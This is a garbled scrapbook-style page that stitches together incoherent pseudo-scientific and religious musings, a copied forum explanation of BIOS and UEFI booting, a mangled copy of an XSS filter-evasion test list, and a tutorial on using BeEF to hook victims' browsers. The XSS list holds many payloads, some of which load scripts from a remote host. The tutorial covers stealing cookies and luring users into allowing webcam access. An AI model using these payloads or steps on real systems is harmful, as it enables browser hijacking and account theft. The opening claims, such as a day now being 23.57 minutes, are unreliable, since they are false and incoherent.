the infinite quark 00+-00 charged with N command virus synthetis took 2 million clorate particles to hang over an assymetric LAN where the orbit lives

 let me try to divide this: the infinite electrical charge of a null number on a loop command input over a virus cure took 2 million chemical chlorate formulas to live over an orbit which is build on a LAN

 why not consider the universe as a vaccum without gas molecules, and make an experience of creating an explosion by the chock of two vaccumns libertation on hydrogene

 and let's consider that the hydrogene is the pressure created by the vaccumns

Elsa David

I was crying over here, but not alone; this is so very difficult to swallow, and Jesus did not ask me my opinion, if I would or would not like to be part of a God's plan; Maybe he has a reward of me, I'm not excpeting; but then, nevertheless, God has never been Justice; What's God then? and why do we keep on trying to explain where the universes begun? If the universes are infinite, God is infinite, the beggining is infinite, and the end is infinite; if they have will meet? Well, time as a measure shrinked in the year 2000, there's no more 24 hours, but 23.57 minutes; the universe shrinked then, all the orbits shrinked...are we running for the end? but ...why do we keep on using the same category of measuring? time, has seconds, distance as meters, liquids as gallons??? why not measure a neutron with the measure of virus? of cells composition? and why using numbers for the couting of cells, and not letters? and why are this language letters and not numbers? and why computaion is symbols, letters and numbers, and not cells? and why not giving cells chemical compositions with concepts and not numbers? and so on..as soon we get to think without pre formed languages, with numbers, we might make a different question, and get the answer, who is God, where the begging of "virus" of choloratesynthesis begun?

https://issuu.com/alabarga/docs/hacker_s_manual_2015_-_power_up_you/1
PAGE 81

Here is what happens in a minimal system boot:
A typical small ARM-style system doesn't have a 'BIOS' or 'EFI' or anything on it. When you 'turn on' the system then voltage is applied to the 'SoC' and the processor immediately begins executing any code that may exist at address 0x0 (or 0x8000 or whatever it is for that particular processor). This corresponds to physical traces on the motherboard and a flash chip.
That flash will be programmed with your 'Boot loader'. You see the SoC doesn't understand how the hardware is configured or anything like that. It doesn't know what the pins on the processor does or how to use main memory. It doesn't know how to read your SD card or turn on a network interface or anything like that. The bootloader must actually program the low-level interfaces on the SoC to even begin to be using memory or anything like that. As a programmer it would be your job to know how to flip the bits and detect memory so that the computer can begin using it. Then whatever storage device you want to use for the OS.. you have to configure that also. Just a minimal amount to activate the larger storage device and load and execute the Linux kernel.
So a operating system doesn't actually need any sort of 'firmware' at all. There is no absolute need for a BIOS or EUFI or anything like that. The Linux kernel itself can do all the configuration that is necessary, but you need something very specific to that mainboard that knows how to do the lowest levels of configuration.. which is what coreboot is for.
Which is why on your ARM-based phone or MIPS router or whatever you can 'brick' it by a doing a bad bootloader flash. Without a functioning bootloader there is no way to interact with the hardware. (Although modern systems are incorporating more features to avoid these problems and make it more friendly to ham-fisted firmware updaters)
The BIOS originally was developed as a sort of ghetto operating system.
It was designed for a era were you didn't have operating systems. You had single-task machines that when they booted they just launched a single application.
The BIOS then provided a set of functions and resources that applications could use to run. It had some fonts, CGA graphics API, ability to read floppy drives and that sort of thing.
The BIOS really is a API of sorts.
Cracking and cloning the BIOS was a huge step forward for PC systems because for the first time it allowed applications written for one PC to be executed successfully on a PC clone.
Later on people produced disk operating systems... which all they did was provide a file system for managing files on a disk. MS-DOS was one of many for x86 systems, but many other types of architectures had DOS systems as well.
When Microsoft finally started coming out with real operating systems like Windows 95 for the PC the BIOS was used for boot strapping the OS.
The x86 'bootloader' is then really a x86 BIOS program used to launch OSes. Of course Windows 95 wasn't that smart so you still relied on the BIOS to configure bits and pieces of hardware.
Later on, of course, you had things like ACPI so that the OS had a standardized way to interact with the hardware for power management among other things.
So with x86 you had a sort of 'dual OS' thing going were you had this stupid ghetto OS people referred to as the 'BIOS' or 'Firmware' and then the real OS for running applications.
The BIOSes typically are kinda shit. They are going to be specific to specific hardware, but typically how they are programmed is that they are copy and pasted from older mainboard designs and then screwed around with until they boot windows. So in your BIOS-based x86 system you will have lots of bastardized code that is floating around that is designed to run hardware from 20 years ago.
This sort of thing is why Linux kernel programmers have to spend a great deal of time 'undoing' the damage caused to your system by it's BIOS.
These sorts of things have some benefits, of course. When you load a OS and bootloader for x86 the hardware is 'made generic' through the use of the BIOS. If you ever tried to build your own OS for a smart phone you'd realize that you need to program and build the kernel and bootloader for that specific device... that is a kernel/bootloader from a different system won't work because the hardware is different. With X86 systems the BIOS hides the details and allows a single binary bootloader and kernel to easily work across a wide variety of systems.
UEFI, is then, a modernized BIOS. Instead of having a mixture of ancient x86 machine code and assembly written by retarded monkeys they have much more 'modern' approach.
It is much more sophisticated and flexible. It has it's own programming languages and interpreters. Firmware on UEFI-enabled devices like video cards can load their own 'drivers' that allow them to be used directly by UEFI.
All sorts of crap like that.
Which is why now you can have these really fancy 'graphical' EUFI configuration screens. The UEFI firmware on your peripheral devices can provide rich interfaces for how to interact with the hardware.
Unfortunately this means that it's extremely complicated and big. The firmware is now as big and complicated as a full-fledged OS.
Complicated and big is bad. This means more bugs. Some bugs are security bugs so more bugs means more security holes. Also it's generally proprietary so you have different groups of people trying to write the same thing from scratch so they can inject their 'secret sauce'. So now not only you have something that is big and buggy, but also has lots of different sets of unique bugs.
But it still allows Microsoft to crank out one binary that works generically across a bunch of different hardware.
Also it allows for a lot of fancy new ways to manage your hardware independently of the OS. Which while often convenient it is also going to be full of bugs and is proprietary. Which is going to be especially bad when the UEFI stuff allows for remote configuration and will piggy back on your network interfaces and doesn't go away completely when the real OS is loaded.
edit:
Thank you for the reddit gold very much.


https://www.reddit.com/r/linux/comments/37c38l/uefi_backdoor_allows_root_exploit_in_linux/

HTML Purifier XSS Attacks Smoketest ( http://htmlpurifier.org/live/smoketests/xssAttacks.php)

HTML Purifier XSS Attacks Smoketest

XSS attacks are from http://ha.ckers.org/xss.html.
Caveats: Google.com has been programatically disallowed, but as you can see, there are ways of getting around that, so coverage in this area is not complete. Most XSS broadcasts its presence by spawning an alert dialogue. The displayed code is not strictly correct, as linebreaks have been forced for readability. Linewraps have been marked with ». Some tests are omitted for your convenience. Not all control characters are displayed.

Test

Name	Raw	Output	Render
XSS Locator	';alert(String.fromCharCode( » 88,83,83))//\';alert(String. » fromCharCode(88,83,83))//";a » lert(String.fromCharCode(88, » 83,83))//\";alert(String.fro » mCharCode(88,83,83))//-->

» CRIPT>">'>» >

SCRIPT w/Source File

SCRIPT w/Char Code

BASE

»

HREF="javascript:alert('XSS' » );//">

BGSOUND

»

SRC="javascript:alert('XSS') » ;">

BODY background-image

»

BACKGROUND="javascript:alert » ('XSS');">

BODY ONLOAD

DIV background-image 1

»

STYLE="background-image: » url(javascript:alert('XSS')) » ">

DIV background-image 2

»

STYLE="background-image: » url(
javascript:alert('XS » S'))">

DIV expression

»

expression(alert('XSS'));">

FRAME

»

SRC="javascript:alert('XSS') » ;">

IFRAME

INPUT Image

»

SRC="javascript:alert('XSS') » ;">

IMG w/JavaScript Directive

»

SRC="javascript:alert('XSS') » ;">

IMG No Quotes/Semicolon

»

SRC=javascript:alert('XSS')>

IMG Dynsrc

»

DYNSRC="javascript:alert('XS » S');">

IMG Lowsrc

»

LOWSRC="javascript:alert('XS » S');">

IMG Embedded commands 1

»

SRC="http://www.thesiteyouar » eon.com/somecommand.php?some » variables=maliciouscode">

»

src="http://www.thesiteyouar » eon.com/somecommand.php?some » variables=maliciouscode" » alt="somecommand.php?somevar » iables=maliciousc" />

IMG STYLE w/expression

exp/*»

STYLE='no\xss:noxss("*//*"); » xss:ex/*XSS*//*/* » /pression(alert("XSS"))'>

exp/*

exp/*

List-style-image

XSS

XSS

• XSS

IMG w/VBscript

»

SRC='vbscript:msgbox("XSS")' » >

LAYER

»

SRC="http://ha.ckers.org/scr » iptlet.html">

Livescript

»

SRC="livescript:[code]">

US-ASCII encoding

scriptalert(XSS)/script »

scriptalert(XSS)/script

scriptalert(XSS)/script

META

»

CONTENT="0;url=javascript:al » ert('XSS');">

META w/data:URL

»

CONTENT="0;url=data:text/htm » l;base64,PHNjcmlwdD5hbGVydCg » nWFNTJyk8L3NjcmlwdD4K">

META w/additional URL parameter

»

CONTENT="0; » URL=http://;URL=javascript:a » lert('XSS');">

Mocha

OBJECT

OBJECT w/Embedded XSS

Embed Flash

»

SRC="http://ha.ckers.org/xss » .swf" » AllowScriptAccess="always">< » /EMBED>

STYLE

STYLE w/Comment

»

STYLE="xss:expr/*XSS*/ession » (alert('XSS'))">

STYLE w/Anonymous HTML

»

STYLE="xss:expression(alert( » 'XSS'))">

STYLE w/background-image

»

CLASS=XSS>

STYLE w/background

Stylesheet

»

HREF="javascript:alert('XSS' » );">

Remote Stylesheet 1

»

HREF="http://ha.ckers.org/xs » s.css">

Remote Stylesheet 2

Remote Stylesheet 3

»

Content="» g/xss.css>; REL=stylesheet">

Remote Stylesheet 4

TABLE

»

BACKGROUND="javascript:alert » ('XSS')">

TD

»

BACKGROUND="javascript:alert » ('XSS')">

XML namespace

»

namespace="xss" » implementation="http://ha.ck » ers.org/xss.htc"> X » SS

<?import namespace="xss" »
implementation="http://ha.ck »
ers.org/xss.htc">
XSS

XSS

XML data island w/CDATA

»

ID=I><![CDATA[» SRC="javas]]><![CDATA[cript: » alert('XSS');">]]> » » DATAFLD=C DATAFORMATAS=HTML>

<IMG »
SRC="javascript:alert('XSS') »
;">

XML data island w/comment

»

SRC="javascript:alert('XSS')">< » /I> » DATASRC="#xss" DATAFLD="B" » DATAFORMATAS="HTML">

»

alt="javas<!-- » -->cript:alert('XSS')" » />

XML (locally hosted)

»

SRC="http://ha.ckers.org/xss » test.xml" ID=I> » DATASRC=#I DATAFLD=C » DATAFORMATAS=HTML>

XML HTML+TIME

»

prefix="t" » ns="urn:schemas-microsoft-co » m:time"> » namespace="t" » implementation="#default#tim » e2"> » attributeName="innerHTML" » to="XSS" » >

<?xml:namespace »
prefix="t" »
ns="urn:schemas-microsoft-co »
m:time">

<?import »
namespace="t" »
implementation="#default#tim »
e2">

Commented-out Block

Cookie Manipulation

»

HTTP-EQUIV="Set-Cookie" » Content="USERID=">

Local .htc file

»

url(http://ha.ckers.org/xss. » htc);">

Rename .js to .jpg

SSI

PHP

»

echo('aler » t("XSS")'); ?>

<? echo('alert("XSS")'); »
?>

JavaScript Includes

Character Encoding Example

<
%3C
&lt
<
&LT
<
&#60 »

&#060
&#0060

&#00060
&#000 »
060
&#0000060
<
<
& »
#0060;
<
<
&# »
0000060;
&#x3c
&#x03c
&#x003 »
c
&#x0003c
&#x00003c
&#x0000 »
03c
<
<

< »

<
<
&#x000 »
003c;
&#X3c
&#X03c
&#X003c
& »
#X0003c
&#X00003c
&#X000003c »

<
<
<
&#X »
0003c;
<
&#X000003c »
;
&#x3C

&#x03C
&#x003C
&#x0 »
003C
&#x00003C
&#x000003C
&# »
x3C;
<
<
&#x000 »
3C;
<
<
& »
#X3C
&#X03C
&#X003C
&#X0003C »

&#X00003C
&#X000003C

&#X3C »
;
<
<
< »

<
<
\x3c »

\x3C
\u003c
\u003C

<
%3C
&lt
<
&L »
T
&LT;
<
<
<

& »
lt;
<
<
<
<
< »

<
<
<
<
<
&l »
t;
<
<
<
<
<
 »

<
<
<
<
<
&l »
t;
<
<
<
<
<
 »
<
<
<
<
<
&lt »
;

<
<
<
<
<
 »
<
<
<
<
<
&lt »
;
<
<
<
<
<
& »
lt;

<
<
<
<
&lt »
;
<
\x3c
\x3C
\u003c
\u00 »
3C

< %3C &lt < &LT < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < \x3c \x3C \u003c \u003C

Case Insensitive

»

SRC=JaVaScRiPt:alert('XSS')>

HTML Entities

»

SRC=javascript:alert("X » SS")>

Grave Accents

»

SRC=`javascript:alert("RSnak » e says, 'XSS'")`>

»

src="%60javascript%3Aalert(" » alt="`javascript:alert(&quot » ;RSnake" />

Image w/CharCode

»

SRC=javascript:alert(String. » fromCharCode(88,83,83))>

UTF-8 Unicode Encoding

»

SRC=java&# » 115;crip& » #116;:ale& » #114;t('X&# » 83;S')>

Long UTF-8 Unicode w/out Semicolons

»

SRC=&#0000106&#0000097&#0000 » 118&#0000097&#0000115&#00000 » 99&#0000114&#0000105&#000011 » 2&#0000116&#0000058&#0000097 » &#0000108&#0000101&#0000114& » #0000116&#0000040&#0000039&# » 0000088&#0000083&#0000083&#0 » 000039&#0000041>

DIV w/Unicode

»

STYLE="background-image:\007 » 5\0072\006C\0028'\006a\0061\ » 0076\0061\0073\0063\0072\006 » 9\0070\0074\003a\0061\006c\0 » 065\0072\0074\0028.1027\0058 » .1053\0053\0027\0029'\0029">

Hex Encoding w/out Semicolons

»

SRC=&#x6A&#x61&#x76&#x61&#x7 » 3&#x63&#x72&#x69&#x70&#x74&# » x3A&#x61&#x6C&#x65&#x72&#x74 » &#x28&#x27&#x58&#x53&#x53&#x » 27&#x29>

UTF-7 Encoding

»

HTTP-EQUIV="CONTENT-TYPE" » CONTENT="text/html; » charset=UTF-7"> » +ADw-SCRIPT+AD4-alert » ('XSS');+ADw-/SCRIPT+AD4-

+ADw-SCRIPT+AD4-alert('XSS') »
;+ADw-/SCRIPT+AD4-

+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

Escaping JavaScript escapes

\";alert('XSS');//

\";alert('XSS');//

\";alert('XSS');//

End title tag

STYLE w/broken up JavaScript

Embedded Tab

»

SRC="jav\tascript:alert('XSS' » );">

»

src="jav%20ascript%3Aalert(' » XSS');" alt="jav » ascript:alert('XSS');" />

Embedded Encoded Tab

»

SRC="jav ascript:alert( » 'XSS');">

»

src="jav%20ascript%3Aalert(' » XSS');" alt="jav » ascript:alert('XSS');" />

Embedded Newline

»

SRC="jav ascript:alert( » 'XSS');">

»

src="jav%20ascript%3Aalert(' » XSS');" alt="jav » ascript:alert('XSS');" />

Embedded Carriage Return

»

SRC="jav ascript:alert( » 'XSS');">

»

src="jav%20ascript%3Aalert(' » XSS');" alt="jav » ascript:alert('XSS');" />

Multiline w/Carriage Returns

»

p t : a l e r t ( ' X S S ' » ) " >

»

src="j%20a%20v%20a%20s%20c%2 » 0r%20i%20p%20t%20%3A%20a%20l » %20e%20r%20t%20(%20'%20X%20S » %20S%20'%20)" alt="j a v a s » c r i p t : a l e r t ( ' X » S" />

Null Chars 1

»

SRC=java\0script:alert("XSS") » >

Null Chars 2

&\0

IPT>alert("XSS")\0 » IPT>

&

&

Spaces/Meta Chars

»

javascript:alert('XSS');">

Non-Alpha/Non-Digit

Non-Alpha/Non-Digit Part 2

»

onload!#$%&()*~+-_.,:;?@[/|\ » ]^`=alert("XSS")>

No Closing Script Tag

Evade Regex Filter 1

Evade Regex Filter 2

Evade Regex Filter 3

Evade Regex Filter 4

Evade Regex Filter 5

Filter Evasion 1

PT »
SRC="http://ha.ckers.org/xss »
.js">

PT »
SRC="http://ha.ckers.org/xss »
.js">

PT SRC="http://ha.ckers.org/xss.js">

Filter Evasion 2

IP Encoding

»

HREF="http://66.102.7.147/"> » XSS

»

href="http://66.102.7.147/"> » XSS

XSS

URL Encoding

»

HREF="http://%77%77%77%2E%67 » %6F%6F%67%6C%65%2E%63%6F%6D" » >XSS

XSS

XSS

Dword Encoding

»

HREF="http://1113982867/">XS » S

XSS

XSS

Hex Encoding

»

HREF="http://0x42.0x0000066. » 0x7.0x93/">XSS

XSS

XSS

Octal Encoding

»

HREF="http://0102.0146.0007. » 00000223/">XSS

XSS

XSS

Mixed Encoding

»

HREF="h tt\tp://6 6.00014 » 6.0x7.147/">XSS

»

href="h%20tt%20p%3A//6%206.0 » 00146.0x7.147/">XSS

XSS

Protocol Resolution Bypass

»

HREF="//www.google.com/">XSS »

XSS

XSS

Firefox Lookups 1

XSS

XSS

XSS

Firefox Lookups 2

»

HREF="http://ha.ckers.org@go » ogle">XSS

»

href="http://google">XSS

XSS

Firefox Lookups 3

»

HREF="http://google:ha.ckers » .org">XSS

»

href="http://google">XSS

XSS

Removing Cnames

»

HREF="http://google.com/">XS » S

XSS

XSS

Extra dot for Absolute DNS

»

HREF="http://www.google.com. » /">XSS

XSS

XSS

JavaScript Link Location

»

HREF="javascript:document.lo » cation='http://www.google.co » m/'">XSS

XSS

XSS

Content Replace

»

HREF="http://www.gohttp://ww » w.google.com/ogle.com/">XSS< » /A>

»

href="http://www.gohttp//www » .google.com/ogle.com/">XSS</ » a>

XSS

 

Beatles - Yellow Submarine

   Web App Hacking (Hackers Handbook).pdf by Elsa Cristina David

http://fortay.teknikata.com/infosec/Web%20App%20Hacking%20%28Hackers%20Handbook%29.pdf

How to Hack Web Browsers with BeEF

I will introduce you to new hacking tools and techniques, though, one tool that we will be using in all of those areas is called the Browser Exploitation Framework, or BeEF (don't ask me what the lowercase "e" stands for).

Similar to Metasploit, BeEF is a framework for launching attacks. Unlike Metasploit, it is specific to launching attacks against web browsers. In some cases, we will be able to use BeEF in conjunction with Metasploit to launch particular attacks, so I think its time for us to become familiar with it.

BeEF was developed by a group of developers led by Wade Alcorn. Built on the familiar Ruby on Rails platform, BeEF was developed to explore the vulnerabilities in browsers and test them. In particular, BeEF is an excellent platform for testing a browser's vulnerability to cross-site scripting (XSS) and other injection attacks.

Step 1: Start Cooking BeEF
BeEF is built into Kali Linux, and it can be started as a service and accessed via a web browser on your localhost. So let's start by firing up Kali and cooking a bit of BeEF. Start the BeEF service by going to "Applications" -> "Kali Linux" -> "System Services" -> "BeEF" -> "beef start."

Step 2: Opening a Browser to BeEF
The BeEF server can be accessed via any browser on our localhost (127.0.0.1) web server at port 3000. To access its authentication page, go to:

http://localhost:3000/ui/authentication

The default credentials are "beef" for both username and password.

Great! Now you have successfully logged into BeEF and are ready to begin using this powerful platform to hack web browsers.

Note that in the screenshot below that my local browser, 127.0.0.1, appears in the left hand "Hooked Browsers" explorer after I clicked on the link to the demo page. BeEF also displays its "Getting Started" window to the right.

Step 3: Viewing Browser Details

If I click on the local browser, it will provide with more choices to the right including a "Details" window where we can get all the particulars of that browser. Since I am using the Iceweasel browser built into Kali, which is built upon Firefox, it shows me that the browser is Firefox.

It also shows me the version number (24), the platform (Linux i686), any components (Flash, web sockets, etc.), and more information that we will be able to use in later web application hacks.

Step 4: Hooking a Browser
The key to success with BeEF is to "hook" a browser. This basically means that we need the victim to visit a vulnerable web app. This injected code in the "hooked" browser then responds to commands from the BeEF server. From there, we can do a number of malicious things on the victim's computer.

BeEF has a JavaScript file called "hook.js," and if we can get the victim to execute it in a vulnerable web app, we will hook their browser! In future tutorials, we will look at multiple ways to get the victim's browser hooked.

In the screenshot below, I have "hooked" an Internet Explorer 6 browser on an old Windows XP on my LAN at IP 192.168.89.191.

Step 5: Running Commands in the Browser
Now, that we have hooked the victim's browser, we can use numerous built-in commands that can executed from the victim's browser. Below are just a few examples; there are many others.

• Get Visited Domains
• Get Visited URLs
• Webcam
• Get All Cookies
• Grab Google Contacts
• Screenshot

In the screenshot below, I selected the "Webcam" command that many of you may be interested in. As you can see, when I execute this command, an Adobe Flash dialog box will pop up on the screen of the user asking, "Allow Webcam?" If they click "Allow," it will begin to return pictures from the victim's machine to you.

Of course, the text can be customized, so be imaginative. For instance, you could customize the button to say "You have just won the lottery! Click here to collect your winnings!" or "Your software is out of date. Click here to update and keep your computer secure." Other such messages might entice the victim to click on the box.

Step 6: Getting Cookies
Once we have the browser hooked, there is almost unlimited possibilities of what we can do. If we wanted the cookies of the victim, we can go to "Chrome Extensions" and select "Get All Cookies" as shown in the screenshot below.

When we click on the "Execute" button to the bottom right, it will begin collecting all the cookies from the browser. Obviously, once you have the user's cookies, you are likely to have access to their websites as well.

BeEF is an extraordinary and powerful tool for exploiting web browsers. In addition to what I have shown you here, it can also be used to leverage operating system attacks. We will be using it and other tools in my new series on hacking web applications, mobile devices, and Facebook, so keep coming back, my greenhorn hackers.

References: @occupytheweb from Null Byte 

http://www.hackinsight.org/news,222.html